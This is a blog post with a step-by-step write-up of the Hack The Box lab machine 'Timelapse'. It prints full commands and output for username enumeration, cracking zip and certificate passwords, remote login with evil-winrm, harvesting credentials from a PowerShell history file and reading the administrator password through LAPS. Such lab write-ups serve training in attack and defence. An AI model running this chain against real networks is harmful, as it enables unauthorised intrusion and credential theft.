<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="Timelapse, Zh0um1&#39;s Blog">
    <meta name="description" content="ForewordThere is no Chinese input method in kali, please forgive my English level
Enumerationnmap┌──(root💀kali)-[~]
   ">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>Timelapse | Zh0um1&#39;s Blog</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 6.1.0"></head>




<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/logo.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">Zh0um1&#39;s Blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/logo.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">Zh0um1&#39;s Blog</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/8.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">Timelapse</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/HTB/">
                                <span class="chip bg-color">HTB</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2022-04-08
                </div>
                

                

                

                

                
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="Foreword"><a href="#Foreword" class="headerlink" title="Foreword"></a>Foreword</h1><p>There is no Chinese input method in kali, please forgive my English level</p>
<h1 id="Enumeration"><a href="#Enumeration" class="headerlink" title="Enumeration"></a>Enumeration</h1><h2 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h2><pre class="language-none"><code class="language-none">┌──(root💀kali)-[~]
    └─# nmap -sC -sV -T4 10.10.11.152                                                                                                                        1 ⚙
Starting Nmap 7.92 ( https:&#x2F;&#x2F;nmap.org ) at 2022-04-08 16:17 CST
Nmap scan report for 10.10.11.152
Host is up (0.58s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53&#x2F;tcp   open  domain        Simple DNS Plus
88&#x2F;tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-08 16:19:48Z)
135&#x2F;tcp  open  msrpc         Microsoft Windows RPC
139&#x2F;tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389&#x2F;tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445&#x2F;tcp  open  microsoft-ds?
464&#x2F;tcp  open  kpasswd5?
593&#x2F;tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636&#x2F;tcp  open  tcpwrapped
3268&#x2F;tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269&#x2F;tcp open  tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:&#x2F;o:microsoft:windows

Host script results:
|_clock-skew: 8h01m34s
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-04-08T16:20:31
|_  start_date: N&#x2F;A

Service detection performed. Please report any incorrect results at https:&#x2F;&#x2F;nmap.org&#x2F;submit&#x2F; .
Nmap done: 1 IP address (1 host up) scanned in 135.90 seconds</code></pre>

<p>Add domain <code>timelapse.htb</code> to <code>etc/hosts</code></p>
<h2 id="Out-of-domain-username-enumeration"><a href="#Out-of-domain-username-enumeration" class="headerlink" title="Out-of-domain username enumeration"></a>Out-of-domain username enumeration</h2><pre class="language-none"><code class="language-none">┌──(root💀kali)-[&#x2F;opt&#x2F;tools&#x2F;domain_tools]
└─# .&#x2F;kerbrute userenum -d timelapse.htb &#x2F;usr&#x2F;share&#x2F;seclists&#x2F;Usernames&#x2F;top-usernames-shortlist.txt --dc 10.10.11.152                                     1 ⚙

    __             __               __     
   &#x2F; &#x2F;_____  _____&#x2F; &#x2F;_  _______  __&#x2F; &#x2F;____ 
  &#x2F; &#x2F;&#x2F;_&#x2F; _ \&#x2F; ___&#x2F; __ \&#x2F; ___&#x2F; &#x2F; &#x2F; &#x2F; __&#x2F; _ \
 &#x2F; ,&lt; &#x2F;  __&#x2F; &#x2F;  &#x2F; &#x2F;_&#x2F; &#x2F; &#x2F;  &#x2F; &#x2F;_&#x2F; &#x2F; &#x2F;_&#x2F;  __&#x2F;
&#x2F;_&#x2F;|_|\___&#x2F;_&#x2F;  &#x2F;_.___&#x2F;_&#x2F;   \__,_&#x2F;\__&#x2F;\___&#x2F;                                        

Version: v1.0.3 (9dad6e1) - 04&#x2F;08&#x2F;22 - Ronnie Flathers @ropnop

2022&#x2F;04&#x2F;08 16:50:09 &gt;  Using KDC(s):
2022&#x2F;04&#x2F;08 16:50:09 &gt;   10.10.11.152:88

2022&#x2F;04&#x2F;08 16:50:10 &gt;  [+] VALID USERNAME:       guest@timelapse.htb
2022&#x2F;04&#x2F;08 16:50:10 &gt;  [+] VALID USERNAME:       administrator@timelapse.htb
2022&#x2F;04&#x2F;08 16:50:11 &gt;  Done! Tested 17 usernames (2 valid) in 1.377 seconds</code></pre>

<h2 id="smbmap"><a href="#smbmap" class="headerlink" title="smbmap"></a>smbmap</h2><pre class="language-none"><code class="language-none">┌──(kali㉿kali)-[~]
└─$ smbmap -H 10.10.11.152 -u guest
[+] IP: 10.10.11.152:445        Name: timelapse.htb                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Shares                                                  READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share</code></pre>

<p>using the smbmap can found <code>Shares</code> have read privilege</p>
<p>try to login with guest by smbclient, there have a backup zip file</p>
<pre class="language-none"><code class="language-none">┌──(root💀kali)-[&#x2F;opt&#x2F;tools&#x2F;domain_tools]
└─# smbclient -U guest -W timelapse.htb &#x2F;&#x2F;timelapse.htb&#x2F;Shares                                                                                     130 ⨯ 1 ⚙
Enter TIMELAPSE.HTB\guest&#39;s password: 
Try &quot;help&quot; to get a list of possible commands.
smb: \&gt; ls
  .                                   D        0  Mon Oct 25 23:39:15 2021
  ..                                  D        0  Mon Oct 25 23:39:15 2021
  Dev                                 D        0  Tue Oct 26 03:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 23:48:42 2021

                6367231 blocks of size 4096. 1382234 blocks available
smb: \&gt; cd dev
smb: \dev\&gt; ls
  .                                   D        0  Tue Oct 26 03:40:06 2021
  ..                                  D        0  Tue Oct 26 03:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 23:46:42 2021

                6367231 blocks of size 4096. 1382218 blocks available</code></pre>

<p>get it!</p>
<h2 id="Brute-password"><a href="#Brute-password" class="headerlink" title="Brute password"></a>Brute password</h2><p>unzip the backup file need password</p>
<p>so, I should find the password at first</p>
<pre class="language-none"><code class="language-none">┌──(kali㉿kali)-[~]
└─$ zip2john winrm_backup.zip &gt; hash.txt
                   
┌──(kali㉿kali)-[~]
└─$ john hash.txt --wordlist&#x3D;&#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32&#x2F;64])
Will run 4 OpenMP threads
Press &#39;q&#39; or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip&#x2F;legacyy_dev_auth.pfx)     
1g 0:00:00:00 DONE (2022-04-08 17:54) 3.846g&#x2F;s 13359Kp&#x2F;s 13359Kc&#x2F;s 13359KC&#x2F;s surki..superkeep16
Use the &quot;--show&quot; option to display all of the cracked passwords reliably
Session completed</code></pre>

<p>get password <code>supremelegacy</code></p>
<p>unzip the to get <code>legacyy_dev_auth.pfx</code> file. This file also should password to open, using john too</p>
<pre class="language-none"><code class="language-none">python pfx2john.py ~&#x2F;legacyy_dev_auth.pfx &gt; ~&#x2F;pfx_hash.txt

john pfx_hash.txt --format&#x3D;pfx --wordlist&#x3D;&#x2F;usr&#x2F;share&#x2F;wordlists&#x2F;rockyou.txt</code></pre>

<p>get password: <code>thuglegacy</code></p>
<p>unlock the pfx file, I found a file named <code>Legacyy</code> in it, and the name is a vaild username in kerberos</p>
<pre class="language-none"><code class="language-none">    __             __               __     
   &#x2F; &#x2F;_____  _____&#x2F; &#x2F;_  _______  __&#x2F; &#x2F;____ 
  &#x2F; &#x2F;&#x2F;_&#x2F; _ \&#x2F; ___&#x2F; __ \&#x2F; ___&#x2F; &#x2F; &#x2F; &#x2F; __&#x2F; _ \
 &#x2F; ,&lt; &#x2F;  __&#x2F; &#x2F;  &#x2F; &#x2F;_&#x2F; &#x2F; &#x2F;  &#x2F; &#x2F;_&#x2F; &#x2F; &#x2F;_&#x2F;  __&#x2F;
&#x2F;_&#x2F;|_|\___&#x2F;_&#x2F;  &#x2F;_.___&#x2F;_&#x2F;   \__,_&#x2F;\__&#x2F;\___&#x2F;                                        

Version: v1.0.3 (9dad6e1) - 04&#x2F;08&#x2F;22 - Ronnie Flathers @ropnop

2022&#x2F;04&#x2F;08 18:49:18 &gt;  Using KDC(s):
2022&#x2F;04&#x2F;08 18:49:18 &gt;   10.10.11.152:88

2022&#x2F;04&#x2F;08 18:49:18 &gt;  [+] VALID USERNAME:       Legacyy@timelapse.htb
2022&#x2F;04&#x2F;08 18:49:18 &gt;  Done! Tested 1 usernames (1 valid) in 0.320 seconds</code></pre>

<h1 id="User-flag"><a href="#User-flag" class="headerlink" title="User flag"></a>User flag</h1><p>I try to brute legacyy’s password by kerbrute, but fail</p>
<p>so, let back to where we started. We found a backup file, which name is <code>winrm_backup.zip</code>. Unzip the compressed file, We get the <code>legacyy_dev_auth.pfx</code></p>
<p>Maybe the winrm is a component or service in windows. I try to search it in google and I get the explain by Microsoft.</p>
<blockquote>
<p>Windows Remote Management (WinRM) is the Microsoft implementation of WS-Management Protocol, a standard Simple Object Access Protocol (SOAP)-based, firewall-friendly protocol that allows hardware and operating systems, from different vendors, to interoperate.</p>
</blockquote>
<p>I consider the winrm is similar to SSH. So the credentials are also required.</p>
<p>As we all know, the pfx file usually contains the X.509 certificate and private key, and the <code>legacyy_dev_auth.pfx</code> we haven’t use yet. So I think the pfx can be used for authentication in winrm. Let’s separate the private key and X.509 certficate from the pfx file.</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out Legacyy.pem

openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out cert.key -nodes</code></pre>

<p>Now, the problem is how to connect windows by winrm in linux (kali). I found a tool named <code>evil-winrm</code> in <a target="_blank" rel="noopener" href="https://github.com/Hackplayers/evil-winrm">github</a>, which can connect to remote computer by winrm and use certificates for Authentication. Installation is simple in kali: <code>sudo apt-get install evil-winrm</code></p>
<p>Let’s connect!</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">┌──<span class="token punctuation">(</span>kali㉿kali<span class="token punctuation">)</span>-<span class="token punctuation">[</span>~<span class="token punctuation">]</span>
└─$ evil-winrm -i <span class="token number">10.10</span>.11.152 -S -c Legacyy.pem -k cert.key 

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token keyword">function</span> is unimplemented on this machine

Data: For <span class="token function">more</span> information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm<span class="token comment">#Remote-path-completion</span>

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:<span class="token punctuation">\</span>Users<span class="token punctuation">\</span>legacyy<span class="token punctuation">\</span>Documents<span class="token operator">></span> <span class="token function">whoami</span>
timelapse<span class="token punctuation">\</span>legacyy</code></pre>

<p>get user flag in <code>c:\users\legacyy\desktop\user.txt</code></p>
<h1 id="Root-flag"><a href="#Root-flag" class="headerlink" title="Root flag"></a>Root flag</h1><p>After a long and futile enumeration, Prompted by <code>pyp</code> in <a target="_blank" rel="noopener" href="https://forum.hackthebox.com/t/official-timelapse-discussion/254385/4?u=k0to">forum</a> and this <a target="_blank" rel="noopener" href="https://0xdf.gitlab.io/2018/11/08/powershell-history-file.html">blog</a>, I found the powershell history file</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">*Evil-WinRM* PS C:<span class="token punctuation">\</span>users<span class="token punctuation">\</span>legacyy<span class="token punctuation">\</span>appdata<span class="token punctuation">\</span>Roaming<span class="token punctuation">\</span>Microsoft<span class="token punctuation">\</span>Windows<span class="token punctuation">\</span>PowerShell<span class="token punctuation">\</span>PSReadLine<span class="token operator">></span> <span class="token builtin class-name">type</span> ConsoleHost_history.txt
<span class="token function">whoami</span>
ipconfig /all
<span class="token function">netstat</span> -ano <span class="token operator">|</span>select-string LIST
<span class="token variable">$so</span> <span class="token operator">=</span> New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
<span class="token variable">$p</span> <span class="token operator">=</span> ConvertTo-SecureString <span class="token string">'E3R$Q62^12p7PLlC%KWaxuaV'</span> -AsPlainText -Force
<span class="token variable">$c</span> <span class="token operator">=</span> New-Object System.Management.Automation.PSCredential <span class="token punctuation">(</span><span class="token string">'svc_deploy'</span>, <span class="token variable">$p</span><span class="token punctuation">)</span>
invoke-command -computername localhost -credential <span class="token variable">$c</span> -port <span class="token number">5986</span> -usessl -SessionOption <span class="token variable">$so</span> -scriptblock <span class="token punctuation">&#123;</span>whoami<span class="token punctuation">&#125;</span>
get-aduser -filter * -properties *
<span class="token builtin class-name">exit</span></code></pre>

<p>WOW, there have svc_deploy’s credentials. following the history commands, we can execute commands as svc_deploy user</p>
<pre class="language-none"><code class="language-none">GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D; &#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D; &#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D; &#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;&#x3D;
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
TIMELAPSE\LAPS_Readers                      Group            S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity  Well-known group S-1-18-1                                     Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448</code></pre>

<p>The svc_deploy user is a member of the<code>LAPS_Readers</code> group. After some googling, I found that <code>LAPS_Readers</code> group members can read the password of the administrator user</p>
<pre class="language-none"><code class="language-none">invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock &#123;Get-ADComputer -Identity dc01 -properties * | findstr ms-Mcs-AdmPwd&#125;</code></pre>

<p>I got the password of administrator!</p>
<pre class="language-none"><code class="language-none">ms-Mcs-AdmPwd                        : )Vls1+OD0%8WlDdJ6Q)G!4)-
ms-Mcs-AdmPwdExpirationTime          : 132943373149524209</code></pre>

<p>Now, login as administrator!</p>
<pre class="language-bash" data-language="bash"><code class="language-bash">┌──<span class="token punctuation">(</span>kali㉿kali<span class="token punctuation">)</span>-<span class="token punctuation">[</span>~<span class="token punctuation">]</span>
└─$ evil-winrm -i <span class="token number">10.10</span>.11.152 -S -u administrator -p <span class="token string">')Vls1+OD0%8WlDdJ6Q)G!4)-'</span>                                                                       <span class="token number">130</span> ⨯

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token keyword">function</span> is unimplemented on this machine

Data: For <span class="token function">more</span> information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm<span class="token comment">#Remote-path-completion</span>

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:<span class="token punctuation">\</span>Users<span class="token punctuation">\</span>Administrator<span class="token punctuation">\</span>Documents<span class="token operator">></span> <span class="token function">whoami</span>
timelapse<span class="token punctuation">\</span>administrator</code></pre>

<p>Get root.txt in <code>c:\users\TRX\desktop\root.txt</code></p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">Zh0um1</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://Zh0um1.github.io/posts/628d110">http://Zh0um1.github.io/posts/628d110</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">Zh0um1</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/HTB/">
                                    <span class="chip bg-color">HTB</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/posts/628d110">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/8.jpg" class="responsive-img" alt="Timelapse">
                        
                        <span class="card-title">Timelapse</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-04-08
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Zh0um1
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/HTB/">
                        <span class="chip bg-color">HTB</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/posts/cfde7db2">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/0.jpg" class="responsive-img" alt="Windwos 命令备忘录">
                        
                        <span class="card-title">Windwos 命令备忘录</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2022-04-03
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            Zh0um1
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/Windows/">
                        <span class="chip bg-color">Windows</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h1, h2, h3'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h1, h2, h3').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
